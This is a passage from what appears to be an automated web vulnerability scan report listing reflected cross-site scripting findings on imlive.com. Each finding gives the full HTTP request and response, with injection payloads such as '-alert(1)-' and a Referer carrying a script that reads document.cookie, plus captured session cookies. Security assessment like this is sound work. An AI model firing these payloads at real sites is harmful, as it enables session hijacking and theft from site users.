The value of the ms request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5576b'><a>7cdefc4b49a was submitted in the ms parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /warningms.asp?ms5576b'><a>7cdefc4b49a HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:24:12 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxgivxzPskYVay%2FvTxhkZKJA%3D%3D; path=/
Set-Cookie: ix=k; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:11 GMT
Connection: close
Content-Length: 14486
Vary: Accept-Encoding


<html>
<head>
<title>ImLive.com - warning </title>
</head>

<BODY bgcolor="#ffffff" topmargin=0 alink="#336699" vlink="#336699" link="#336699">
<center>
<script language="JavaScript" type="t
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/warningms.asp?ms5576b'><a>7cdefc4b49a&lr=1107816008&ud=0&pe=warningms.asp&qs=ms5576b'>
...[SNIP]...

2.135. http://imlive.com/warningms.asp [ms parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /warningms.asp

Issue detail

The value of the ms request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a366"><a>e4ecb16fbac was submitted in the ms parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /warningms.asp?ms9a366"><a>e4ecb16fbac HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:24:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxgivxzPskYVay%2FvTxhkZKJA%3D%3D; path=/
Set-Cookie: ix=k; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:00 GMT
Connection: close
Content-Length: 14486
Vary: Accept-Encoding


<html>
<head>
<title>ImLive.com - warning </title>
</head>

<BODY bgcolor="#ffffff" topmargin=0 alink="#336699" vlink="#336699" link="#336699">
<center>
<script language="JavaScript" type="t
...[SNIP]...
<A HREF="/liveexperts.asp?ms9a366"><a>e4ecb16fbac">
...[SNIP]...

2.136. http://imlive.com/warningms.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /warningms.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d01b7'><a>ee151ed1363 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /warningms.asp?d01b7'><a>ee151ed1363=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:24:56 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxgivxzPskYVay%2FvTxhkZKJA%3D%3D; path=/
Set-Cookie: ix=k; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:57 GMT
Connection: close
Content-Length: 14469
Vary: Accept-Encoding


<html>
<head>
<title>ImLive.com - warning </title>
</head>

<BODY bgcolor="#ffffff" topmargin=0 alink="#336699" vlink="#336699" link="#336699">
<center>
<script language="JavaScript" type="t
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/warningms.asp?d01b7'><a>ee151ed1363=1&lr=1107816008&ud=0&pe=warningms.asp&qs=d01b7'>
...[SNIP]...

2.137. http://imlive.com/webcam-advanced-search/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /webcam-advanced-search/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5982a'-alert(1)-'59971b4cff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webcam-advanced-search/?5982a'-alert(1)-'59971b4cff=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhoqyccjVCXBTf954wWPYvp64MXC0Yh32GzThoTYj52vyg%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:56 GMT
Connection: close
Content-Length: 75081
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/advancedsearch.aspx&he=imlive.com&ul=/webcam-advanced-search/?5982a'-alert(1)-'59971b4cff=1&qs=5982a'-alert(1)-'59971b4cff=1&qs=5982a'-alert(1)-'59971b4cff=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function ad
...[SNIP]...

2.138. http://imlive.com/webcam-advanced-search/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /webcam-advanced-search/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9af1e"><a>4c3fec81c51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /webcam-advanced-search/?9af1e"><a>4c3fec81c51=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhoqyccjVCXBTf954wWPYvp64MXC0Yh32GzThoTYj52vyg%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:53 GMT
Connection: close
Content-Length: 74955
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/webcam-advanced-search/?9af1e"><a>4c3fec81c51=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

2.139. http://imlive.com/webcam-faq/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /webcam-faq/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c57b4'-alert(1)-'0e1cfcefff7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webcam-faq/?c57b4'-alert(1)-'0e1cfcefff7=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0aL3siby47TA1QT7oGe%2b8%2b0HFAu%2bfqcO77Lbk%2bAmjH%2bK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:52 GMT
Connection: close
Content-Length: 44471
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/faq_m1.aspx&he=imlive.com&ul=/webcam-faq/?c57b4'-alert(1)-'0e1cfcefff7=1&qs=c57b4'-alert(1)-'0e1cfcefff7=1&qs=c57b4'-alert(1)-'0e1cfcefff7=1&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function
...[SNIP]...

2.140. http://imlive.com/webcam-faq/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /webcam-faq/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5762"><a>e3b37a89d43 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /webcam-faq/?a5762"><a>e3b37a89d43=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0aL3siby47TA1QT7oGe%2b8%2b0HFAu%2bfqcO77Lbk%2bAmjH%2bK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:51 GMT
Connection: close
Content-Length: 44322
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/webcam-faq/?a5762"><a>e3b37a89d43=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

2.141. http://imlive.com/webcam-login/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /webcam-login/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a901'-alert(1)-'19762fb72eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webcam-login/?6a901'-alert(1)-'19762fb72eb=1 HTTP/1.1
Host: imlive.com
Proxy-Connection: keep-alive
Referer: http://imlive.com/homepagems3.asp244f6%27%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e7358040fd9f
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; BIGipServerImlive=2417231426.20480.0000; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; __utmb=71081352.4.10.1296223202

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0aL3siby47TA1QT7oGe%2b8%2b0HFAu%2bfqcO77Lbk%2bAmjH%2bK; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:17:22 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 22258


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/login.aspx&he=imlive.com&ul=/webcam-login/?6a901'-alert(1)-'19762fb72eb=1&rf=http://imlive.com/homepagems3.asp244f6%27%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e7358040fd9f&qs=6a901'-alert(1)-'19762fb72eb=1&qs=6a901'-alert(1)-'19762fb72eb=1&bd=2257131737&sr=1
...[SNIP]...

2.142. http://imlive.com/webcam-login/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /webcam-login/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2bef"><a>297c1fbe51b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /webcam-login/?f2bef"><a>297c1fbe51b=1 HTTP/1.1
Host: imlive.com
Proxy-Connection: keep-alive
Referer: http://imlive.com/homepagems3.asp244f6%27%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e7358040fd9f
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
